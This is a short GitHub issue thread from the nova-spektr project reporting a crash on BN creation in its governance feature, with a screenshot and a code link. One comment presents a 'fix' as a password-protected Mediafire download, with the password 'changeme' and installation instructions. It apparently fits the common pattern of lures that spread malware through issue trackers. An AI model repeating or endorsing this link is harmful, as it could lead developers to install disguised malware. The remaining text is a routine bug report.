### ISSUE TITLE
Governance. Crash on BN creation.

### ISSUE THREAD

**Issue by stepanLav** [novasamatech/nova-spektr#2220]
## Description
Crash when try to create BN
<img width="1464" alt="Screenshot 2024-08-27 at 11 26 50" src="https://github.com/user-attachments/assets/2a2c1c85-61fd-44f1-8fbe-2cc41c93c6a5">

https://github.com/novasamatech/nova-spektr/blob/dev/src/renderer/entities/governance/lib/votingService.ts#L73C1-L81C3

## Environment
https://github.com/novasamatech/nova-spektr/commit/cb012730236d518d6ac8c00c662b47397ad0135d

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by stepanLav** [comment]
Status verification: ✅
